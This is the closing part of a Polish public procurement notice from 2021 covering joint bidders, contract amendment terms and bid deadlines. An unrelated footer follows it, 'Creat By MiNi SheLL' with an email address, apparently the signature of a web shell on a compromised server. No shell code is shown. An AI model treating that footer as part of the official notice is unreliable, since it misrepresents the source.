wstępne<br/>potwierdzenie, że Wykonawcy nie podlegają wykluczeniu i spełniają warunki udziału w<br/>postępowaniu. Oświadczenie, z którego wynika, które dostawy, wykonają poszczególni<br/>Wykonawcy, sporządzone zgodnie z Załącznikiem nr 1e do formularza oferty. (jeżeli dotyczy)<br/>dokumenty/oświadczenia wskazane w pkt 7.2., 7.3, 7.4., 7.5 w Rozdziale 7 SWZ. Zamawiający<br/>będzie żądał, przed zawarciem umowy, kopii umowy regulującej współpracę wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. Wspólników spółki cywilnej obowiązują<br/>przepisy dotyczące wykonawców wspólnie ubiegających się o udzielenie zamówienia. Wspólnicy<br/>spółki cywilnej wraz z ofertą złożą stosowne pełnomocnictwa oraz w przypadku wyboru oferty<br/>jako najkorzystniejszej kopię umowy spółki cywilnej. Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia. W<br/>zakresie nieuregulowanym ustawą Pzp lub niniejszą SWZ do oświadczeń i dokumentów<br/>składanych przez Wykonawcę w postępowaniu zastosowanie mają w szczególności przepisy<br/>rozporządzenia Ministra Rozwoju i Technologii z dnia 23 grudnia 2020 r. w sprawie<br/>podmiotowych środków dowodowych oraz innych dokumentów i oświadczeń, jakich może żądać<br/>Zamawiający od Wykonawcy (Dz. U. z 2020 r. poz. 2415). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zawarte zostały w Załączniku<br/>nr 4 do SWZ Projektowane postanowienia umowy w sprawie zamówienia publicznego, które<br/>zostaną wprowadzone do umowy w sprawie zamówienia publicznego par. 7. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-02 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-02 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-31</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiającemu przysługiwało będzie prawo do rezygnacji z części usług, co jednak nie spowoduje obniżenia kwoty maksymalnego wynagrodzenia należnego Wykonawcy o więcej niż 25 procent. Dopuszczalne jest wydłużenie czasu trwania umowy o maksimum 6 tygodni w sytuacji niewykorzystania przez Zamawiającego wartości przedmiotu umowy do wyczerpania tej wartości. Termin wykonania zamówienia : sukcesywnie przez okres 4 miesięcy od dnia podpisania umowy lub do wykorzystania kwoty w ramach wartości brutto umowy w zależności od tego co nastąpi pierwsze.

Creat By MiNi SheLL
Email: jattceo@gmail.com